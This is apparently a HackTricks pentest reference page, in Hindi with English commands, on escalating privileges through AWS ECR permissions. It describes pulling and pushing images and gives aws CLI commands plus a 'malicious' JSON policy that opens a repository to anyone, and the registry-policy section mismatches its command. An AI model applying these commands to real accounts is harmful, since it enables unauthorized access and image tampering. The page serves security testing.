AWS - ECR Privesc

हैकट्रिक्स का समर्थन करें

ECR

ecr:GetAuthorizationToken,ecr:BatchGetImage

एक हमलावर ecr:GetAuthorizationToken और ecr:BatchGetImage के साथ ECR में लॉगिन कर सकता है और छवियाँ डाउनलोड कर सकता है।

छवियाँ कैसे डाउनलोड करें के बारे में अधिक जानकारी के लिए:

AWS - ECR Post Exploitation

संभावित प्रभाव: ट्रैफिक में संवेदनशील जानकारी को आधारित विशेषाधिकार द्वारा अप्रत्यक्ष वृद्धि।

ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart

उन सभी अनुमतियों के साथ एक हमलावर ECR में लॉगिन कर सकता है और छवियाँ अपलोड कर सकता है। यह उन वातावरणों में विशेषाधिकारों को उन्नत करने के लिए उपयोगी हो सकता है जहां उन छवियाँ उपयोग की जा रही हैं।

नई छवि अपलोड/अपडेट करने के लिए कैसे सीखें, इसकी जाँच करें:

AWS - EKS Enum

ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart

पिछले खंड की तरह, लेकिन सार्वजनिक रिपॉजिटरी के लिए।

ecr:SetRepositoryPolicy

इस अनुमति के साथ एक हमलावर भंडार नीति को बदल सकता है ताकि वह खुद को (या यहाँ तक ​​कि सभी को) पढ़ने/लिखने का अधिकार प्रदान कर सके। उदाहरण के लिए, इस उदाहरण में सभी को पढ़ने का अधिकार दिया गया है।

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

संबंधित विषयों का विवरण:

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

ecr-public:SetRepositoryPolicy

पिछले खंड की तरह, लेकिन सार्वजनिक रिपॉजिटरी के लिए। हमलावर एक ECR सार्वजनिक रिपॉजिटरी की रिपॉजिटरी नीति को संशोधित कर सकता है ताकि अनधिकृत सार्वजनिक पहुंच या अपने विशेषाधिकारों को बढ़ा सके।

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

संभावित प्रभाव: ECR सार्वजनिक रिपॉजिटरी तक अनधिकृत सार्वजनिक पहुंच, जिससे किसी भी उपयोगकर्ता को छवियाँ पुश, पुल, या हटाने की अनुमति मिल सकती है।

ecr:PutRegistryPolicy

इस अनुमति वाले हमलावर खुद को, अपने खाते को (या यहाँ तक कि सभी को) पढ़ने/लिखने की पहुंच प्रदान करने के लिए रजिस्ट्री नीति को बदल सकता है।

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json
हैकट्रिक्स का समर्थन करें

Last updated